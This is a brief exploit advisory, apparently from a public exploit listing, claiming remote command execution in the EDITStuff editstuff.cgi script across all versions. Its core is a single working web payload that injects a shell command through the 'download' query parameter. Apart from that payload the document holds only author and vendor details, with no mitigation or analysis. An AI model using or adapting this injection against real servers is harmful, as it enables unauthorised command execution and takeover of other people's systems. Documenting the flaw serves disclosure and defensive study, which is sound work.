[+] Remote Comand Execution on EDITStuff [+] Date: 22/03/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage : http://editstuff.com/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on Windows 7 and Linux [+] Vulnerable File: editstuff.cgi [+] Version : all [+] Exploit: http://host/edit/editstuff.cgi?download=;id|